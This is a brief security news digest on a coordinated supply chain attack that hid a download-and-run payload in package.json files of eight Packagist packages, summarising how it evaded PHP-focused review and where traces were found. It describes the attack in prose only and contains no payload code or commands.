A coordinated supply chain attack has affected eight Packagist packages by hiding malicious code in package.json instead of composer.json, allowing it to evade PHP-focused review. The payload attempts to download and run a Linux binary from GitHub Releases during install or build workflows, with traces found across hundreds of GitHub files. #Packagist #Composer #packagejson #GitHubReleases #gvfsd-network
Keypoints
- Eight Packagist packages were impacted by a coordinated supply chain attack.
- The malicious code was placed in package.json, not composer.json, to bypass typical PHP dependency checks.
- The payload tried to download a Linux binary from a GitHub Releases URL and execute it from /tmp/.sshd.
- The affected packages were removed from Packagist after discovery.
- References to the same payload were found in 777 GitHub files, including GitHub Actions workflows.
Read More: https://thehackernews.com/2026/05/packagist-supply-chain-attack-infects-8.html